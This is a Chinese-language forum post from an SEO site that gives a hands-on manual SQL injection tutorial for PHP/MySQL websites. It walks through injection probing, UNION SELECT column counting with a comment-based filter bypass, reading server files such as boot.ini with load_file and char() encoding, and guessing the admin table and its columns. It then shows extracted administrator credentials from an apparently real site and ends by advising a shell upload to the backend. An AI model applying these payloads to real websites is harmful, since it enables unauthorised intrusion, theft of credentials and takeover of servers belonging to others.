网站推广-网站优化-合肥久飞SEO论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

查看: 97|回复: 0

教你如何轻松手工拿下php

[复制链接]
发表于 2008-7-25 03:14:24 | 显示全部楼层 |阅读模式
注入点:

1.认识注入类型

不管是asp.aspx.php,注入的标准类型必为




2.判断是否存在注入
不管是asp.aspx.php,注入点的判断都是这样的
and1=1返回正常页
and1=2,返回错误页

存在注入

3.猜解准确字段数
(不明白原理的请多看看这方面的文章,这只讲实际运用)
利用union来查询准确字段,如:and1=2unionselect1,2,3,.......直到返回正常,说明猜到准确字

段数。如过滤了空格可以用/**/代替。

and1=2unionselect1,2,3,4,5,6,7


记下这个位置,3和5

4.mysql也有内置变量,可以帮助我们获得更多信息
version()(4.0.21-nt)返回当前库版本信息,database(){db_atextile_org_cn}返回当前库

名,user(),{tt1330@localhost}返回MYSQL用户名,可以帮助我们获得更多信息。这些都是很基础的东西

现在就在3和5这插入


(),4,5,6,7
Load_file可以返回文件的内容
(1),读取系统信息
[bootloader]timeout=30default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS[operating

systems]multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="WindowsServer2003,Enterprise"

/fastdetect/NoExecute=OptOutmulti(0)disk(0)rdisk(1)partition(1)\WINDOWS="BootMirrorC:-

secondaryplex"multi(0)disk(0)rdisk(1)partition(1)\WINDOWS="BootMirrorC:-secondary

plex"

(2)读取php配置信息

我们转化一下,
load_file('c:\boot.ini')=load_file(char(99,58,92,98,111,111,116,46,105,110,105))


5.准确猜解表
如:and1=1unionselect1,2,3,4,5,6....fromuser如果返回正常说明存在这个表。
and1=1unionselect1,2,3,4,5,6,7fromadmin
说明没有admin表
and1=1unionselect1,2,3,4,5,6,7fromuser
正常说明有这个表

6.猜解表中的字段
and1=1unionselect1,username,3,4,5,6....fromuser/*如果字段显示出字段内容则存在些字段。
and1=1unionselect1,2,user,4,5,6,7fromuser
and1=1unionselect1,2,name,4,5,6,7fromuser
有字段name
同理再猜解password字段,猜解成功再找后台登录。
and1=1unionselect1,2,pass,4,5,6,7fromuser
and1=1unionselect1,2,pwd,4,5,6,7fromuser
有字段pwd


7.暴管理员的用户名,密码是多少
and1=2unionselect1,2,3,4,5,6,7fromuser
and1=2unionselect1,2,pwd,4,name,6,7fromuser

name:admin
pwd:83863176
7.登录后台,上传shell。

本文地址: https://jiufei.net/bbs/thread-85-1-1.html
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|合肥网站优化,合肥百度优化,合肥网络推广,合肥SEO优化论坛 ( 皖ICP备2022014487号-2 )

GMT+8, 2025-1-31 10:36 , Processed in 0.082561 second(s), 15 queries , File On.

Powered by jiufei X3.4

© 2008-2020 www.jiufei.net

快速回复 返回顶部 返回列表